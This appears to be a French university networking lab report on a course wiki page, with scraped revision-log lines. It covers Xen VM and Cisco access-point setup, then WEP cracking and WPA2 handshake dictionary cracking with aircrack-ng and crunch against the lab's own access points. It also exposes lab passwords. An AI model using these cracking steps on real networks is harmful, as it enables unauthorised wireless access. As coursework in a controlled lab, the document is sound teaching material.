au bout de 45min on trouve la clé wpa.

TP sysres IMA2a5 2019/2020 G6

2019-11-13T12:26:49Z

Jcabrald : /* Configuration des points d'accès */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau17112018.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root vers "glopglop', utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Configuration des points d'accès ==

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1/ Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2/ Se mettre en mode previligié :

enable
Password = "Cisco"

3/ Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 4 à 10, sont à faire pour chaque groupe de la promo.

4/ Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5/ On cree un server radius pour un utilisateur :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6/ On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7/ Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8/ Ensuite, on defini le login et le groupe server que l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9/ On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 show vlan // exemple : SSID_IMA2a5_4fun
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10/ Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme on a plusieurs utilisateurs, il faut creer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11 / Créer une sous-interface pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12/ Créer une sous-interface gigabite pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13/ Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14/ rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0

dot11 ssid SSID_groupe
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

TP sysres IMA2a5 2019/2020 G6

2019-11-13T10:22:41Z

Jcabrald : /* Installation des serveurs SSH, DNS et https */

TP système & reseau IMA2a5 2019/2020

2019-11-13T10:11:54Z

Jcabrald : /* Table IP VLANs */

TP système & reseau IMA2a5 2019/2020

2019-11-13T10:09:28Z

Jcabrald : /* Table IP VLANs */

TP système & reseau IMA2a5 2019/2020

2019-11-13T10:06:44Z

Jcabrald : /* Table IP VLANs */